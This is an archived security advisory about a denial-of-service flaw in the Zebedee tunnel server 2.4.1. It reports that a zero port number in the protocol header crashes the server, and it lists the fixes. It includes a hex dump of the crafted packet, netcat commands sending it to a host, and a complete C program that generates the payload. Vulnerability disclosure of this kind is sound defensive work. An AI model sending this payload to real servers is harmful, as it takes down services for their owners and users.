Zebedee DoS Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

We have found a denial of service vulnerability in Zebedee.
This issue have been fixed in 2.4.1A.

[TESTED ON]

Zebedee 2.4.1 (Windows version and source compiled Linux version)

[VULNERABILITY]

The server crushes when "0" received as the port number in the
protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff  >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00              >..0.!..t....<
00001c

The 9th and 10th byte of the header contains 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
 sent 0, rcvd 0

$

In the zebedee.c, please look at the function makeConnection() wich called 
from server(),

   1703     /* Sanity check */
   1704
   1705     assert(host != NULL && port != 0);
   1706

Here, if the port number is "0", both sub and parent processes seemed to 
quit running.

This issue occurs when the "allowed redirection port" not set(in default).

[SOLUTION]

1) Upgrading zebedee to 2.4.1A.
Or
2) Setting up allowed redirection ports will address this issue.

[SAMPLE EXPLOIT]

mkZebedeeDoS.c

/*
	$ gcc -o mkZebedeeDoS mkZebedeeDoS.c
	$ ./mkZebedeeDoS > zebedeeDoS
	$ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{

	int i, size;

	char data[] = {
	0x02, 0x01, // protocol version
	0x00, 0x00, // flags
	0x20, 0x00, // max message size
	0x00, 0x06, // compression info
	0x00, 0x00, // port request: value = 0x0
	0x00, 0x80, // key length
	0xff, 0xff, 0xff, 0xff, // key token
	0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
	0x00, 0x00, 0x00, 0x00 // target host address
	 };

	size = 28;
	for(i=0; i<size; i++){
		printf("%c", data[i]);
	}

	return 0;

}


[DISCOVERED BY]

International Network Security, Inc.
	Mitsuaki Shiraishi
	Tomoki Sanaki
	Mutallip Ablimit


-----------------
International Network Security, Inc.
Shiraishi.M
<shiraishi@xxxxxxxxxx>
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux